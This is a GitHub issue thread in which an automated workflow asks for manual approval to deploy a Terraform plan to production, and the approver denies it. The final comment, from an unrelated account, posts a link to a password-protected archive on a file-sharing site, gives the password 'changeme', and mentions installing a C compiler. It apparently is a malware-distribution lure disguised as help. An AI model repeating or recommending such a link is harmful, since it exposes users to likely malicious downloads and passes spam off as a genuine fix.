### ISSUE TITLE
Manual approval required for workflow run 11088996521: Deploying Branch ${GITHUB_REF##*/}  to Production

### ISSUE THREAD

**Issue by yahyagulshan** [expertscloud/terraform-control-tower#13]
Please review the Terraform plan and approve or deny the deployment to production

Workflow is pending manual review.
URL: https://api.github.com/expertscloud/terraform-control-tower/actions/runs/11088996521

Required approvers: [abaidgulshan]

Respond "approved", "approve", "lgtm", "yes" to continue workflow or "denied", "deny", "no" to cancel.

**Comment by abaidgulshan** [comment]
no

**Comment by yahyagulshan** [comment]
Request denied. Closing issue and failing workflow.

**Comment by SagarChandra07** [comment]
maybe this will help

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive codepass: changeme

you may need to install the c compiler
